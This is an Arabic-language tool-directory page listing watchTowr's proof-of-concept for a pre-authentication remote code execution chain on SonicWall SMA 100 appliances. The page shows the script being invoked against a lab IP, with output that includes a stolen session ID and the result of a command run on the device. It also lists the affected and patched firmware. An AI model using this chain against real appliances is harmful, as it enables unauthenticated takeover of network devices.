Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
watchTowr-vs-SonicWall-PreAuth-RCE-Chain — سلسلة استغلال PoC لتنفيذ التعليمات البرمجية عن بُعد قبل المصادقة على أجهزة SonicWall SMA 100 باستغلال CVE-2023-44221 وCVE-2024-38475. | Kitploit
أدوات/GitHubGitHub/watchtowrlabs/watchtowr-vs-sonicwall-preauth-rce-chain
أمان الأنظمة المدمجةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubwatchtowrlabs/watchtowr-vs-sonicwall-preauth-rce-chain

watchTowr-vs-SonicWall-PreAuth-RCE-Chain

سلسلة استغلال PoC لتنفيذ التعليمات البرمجية عن بُعد قبل المصادقة على أجهزة SonicWall SMA 100 باستغلال CVE-2023-44221 وCVE-2024-38475.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
192منذ سنة واحدةلم تتم المراجعة بعد

PoC لسلسلة RCE قبل المصادقة في SonicWall SMA 100

PoC لسلسلة RCE قبل المصادقة في SonicWall SMA 100 (CVE-2023-44221, CVE-2024-38475)

للمزيد من التفاصيل التقنية، راجع مقالنا على المدونة

https://github.com/user-attachments/assets/b157b39c-d7bd-4385-af7a-e465f8fd4a41

PoC أثناء التنفيذ

root@kitploit:~
python watchTowr-vs-SonicWall-PreAuth-RCE-Chain.py -t https://192.168.8.153/ -c ifconfig
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-SonicWall-PreAuth-RCE-Chain.py

        (*) SonicWall Pre-Auth RCE Chain

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2023-44221, CVE-2024-38475]

[*] Database downloaded successfully as temp.db
[*] Session ID: eT0Hg7tYutyqs0e2ZuXbnnWfjZ0YGnzteRiu9AlMMVU=
[*] CSRF Token: 4fzPDyqMRiAmYY9M9zJU9CefZDqRyUPZ
[*] Session is valid.
[*] Command executed successfully.
<pre>eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500
        inet 192.168.8.153  netmask 255.255.255.0  broadcast 192.168.8.255
        inet6 fe80::20c:29ff:fec9:f9e2  prefixlen 64  scopeid 0x20&lt;link&gt;
        ether 00:0c:29:c9:f9:e2  txqueuelen 1000  (Ethernet)
        RX packets 327943  bytes 143863046 (137.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 229647  bytes 334022494 (318.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10&lt;host&gt;
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 76818  bytes 30267068 (28.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 76818  bytes 30267068 (28.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

sh: &quot;: command not found

Traceroute6 complete.
</pre>

الإصدارات المتأثرة

تؤثر الثغرتان على أجهزة SMA 200 وSMA 210 وSMA 400 وSMA 410 وSMA 500v، وقد تم إصلاحهما في إصدار البرنامج الثابت 10.2.1.14-75sv والإصدارات الأحدث.

تابع watchTowr Labs

لأحدث الأبحاث الأمنية، تابع فريق watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
تنزيل الأداة